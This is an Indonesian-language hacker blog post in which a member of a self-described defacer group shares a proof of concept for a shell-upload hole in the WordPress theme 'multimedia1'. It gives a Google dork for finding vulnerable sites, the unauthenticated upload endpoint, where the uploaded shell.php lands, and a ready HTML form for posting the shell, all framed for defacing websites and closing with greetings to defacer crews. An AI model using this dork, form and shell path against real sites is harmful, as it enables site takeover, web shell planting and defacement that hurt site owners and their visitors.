Deface Wordpress Themes Multimedia1

 Deface Wordpress Themes Multimedia1

 

Hello sobat maxteroit, kali ini saya (Berandal) akan share my new POC about deface wordpress, metodenya yaitu Wordpress themes multimedia1 shell upload vulnerability.
Berikut dokumentasi yg telah saya upload ke web tempat upload poc hacking :

   
Wordpress Themes Multimedia1 Shell Upload Vulnerability | CSRF
Author : Berandal
Google Dork: inurl:/wp-content/themes/multimedia1/
Tested on: Win 7, Linux
Blog : http://www.maxteroit.com/

+-+-+-+-+-+-+-+-+
|B|e|r|a|n|d|a|l|
+-+-+-+-+-+-+-+-+

[!] Exploit : http://127.0.0.1/wp-content/themes/multimedia1/server/php/

[!] File Location : http://127.0.0.1/wp-content/themes/multimedia1/server/php/files/shell.php
[*] CSRF:
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/multimedia1/server/php/" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>


[*] ABOUT:

Facebook: https://www.facebook.com/owlsquad.id
Twitter: https://www.twitter.com/id_berandal
Greetz : All Official Member OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer.

Komentar Spam Akan kami Hapus

Post a Comment

Komentar Spam Akan kami Hapus

Post a Comment (0)

Previous Post Next Post